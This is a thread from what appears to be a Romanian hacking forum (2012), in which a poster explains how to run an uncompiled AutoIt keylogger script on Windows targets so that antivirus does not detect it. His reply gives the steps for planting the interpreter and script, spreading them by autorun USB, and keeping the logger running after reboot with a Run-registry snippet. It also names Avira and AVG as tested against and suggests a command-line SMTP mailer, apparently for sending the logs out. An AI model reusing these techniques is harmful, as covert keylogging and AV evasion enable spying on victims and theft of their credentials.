Fast/Keylogger Windows [AutoIt- Self Extracting Archive]

pyth0n3 · February 2, 2012

E foarte rar sa programez sau sa am de a face cu sistemele Windows dar aveam nevoie sa logez datele din cateva sisteme windows cu protectie antivirus fara sa ma complic sau sa criptez cine stie ce tool sofisticat facut de altii cu sanse sa fie detectat.

Ei bine o metoda simpla si rapida ar fi autoit fara ca scriptul sa fie transformat in exe .

Uite asa mam gandit ca daca cineva sau ceva ar descarca arhiva cu autoit , acesta va putea rula scripturi fara sa fie compilate si fara sa fie vazute de catre antivirus ,asadar exclud si procesul de instalare .

Uite ca functioneaza , si daca scrii doua linii de cod care salveaza input-ul de la tastiera si persista la reboot trebuie doar sa faci in asa fel incat sursa autoit care nu necesita nici un proces de instalare sa fie prezenta in sistemul target.

Rulezi scriptul fara sa il compilezi si nu vine detectat de catre sistemul antivirus.

Nu e cine stie ce , dar mergand pe principiul KISS (keep it simple sir) am obtinut ceea ce mi-a trebuit in scurt timp

AutoIt- Self Extracting Archive (for those who don’t like/want an installer)(includes x86 and x64 components and Aut2Exe and AutoItX)

securityfocus.eu · February 2, 2012

E foarte rar sa programez sau sa am de a face cu sistemele Windows dar aveam nevoie sa logez datele din cateva sisteme windows cu protectie antivirus fara sa ma complic sau sa criptez cine stie ce tool sofisticat facut de altii cu sanse sa fie detectat.
Ei bine o metoda simpla si rapida ar fi autoit fara ca scriptul sa fie transformat in exe .
Uite asa mam gandit ca daca cineva sau ceva ar descarca arhiva cu autoit , acesta va putea rula scripturi fara sa fie compilate si fara sa fie vazute de catre antivirus ,asadar exclud si procesul de instalare .
Uite ca functioneaza , si daca scrii doua linii de cod care salveaza input-ul de la tastiera si persista la reboot trebuie doar sa faci in asa fel incat sursa autoit care nu necesita nici un proces de instalare sa fie prezenta in sistemul target.
Rulezi scriptul fara sa il compilezi si nu vine detectat de catre sistemul antivirus.
Nu e cine stie ce , dar mergand pe principiul KISS (keep it simple sir) am obtinut ceea ce mi-a trebuit in scurt timp
AutoIt- Self Extracting Archive (for those who don’t like/want an installer)(includes x86 and x64 components and Aut2Exe and AutoItX)

Salut,

Nice nu am incercat niciodata.

O zi buna.

bcman · February 3, 2012

Foarte interesant? ideea.

Dar codul/linkul de download lipse?te.

Starker · February 3, 2012

Ok... suna super... un link sau altceva sa putem testa?

cifratorul · February 3, 2012

aceasta idee se poate extinde folosind orice interpretor legitim si un script care contine logica. se poate detecta doar un anumit script ce poate fi modificat f usor .

pyth0n3 · February 3, 2012

Pai arhiva o luati de pe site-ul oficial autoit

Scoateti toate fisierele inafara de interpretul care executa scripturile

Creati un script care logheaza si faceti in in asa fel incat pe sistemul target sa se afle interpretul si scriptul care l-ati facut

Faceti in asa fel incat userul sa execute scriptul folosind interpretul autoit

Putina imaginatie!

N.B. Faceti in asa fel incat scriptul sa porneasca automat de fiecare data cand porneste calculatorul

Cod pentru autostartup


   run(@WindowsDir&"\logyourfinger.au3")

      RegWrite("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "keyup","REG_SZ", @WindowsDir&"\logyourfinger.au3")

Hint: Stick-urile USB Cruser executa un script in automat (autorun) , faceti in asa fel incat sa execute scriptul vostru si sa copie interpretul in computerul target cand vin introduse in pc.

Un script transformat in .exe a fost detectat

Acelasi script cu extensia .au3 nu la detectat

Testul l-am facut doar in target-uri care rulau Avira si AVG , dar nu ar trebui sa fie detectat deoarece sunt intructii care inca nu sunt compilate

Later Edit:

Cateva functii care poate fi de folos:

Mai pun si cireasa pe tort , o sa aveti nevoie de ea

Blat - A Win32 Command Line SMTP Mailer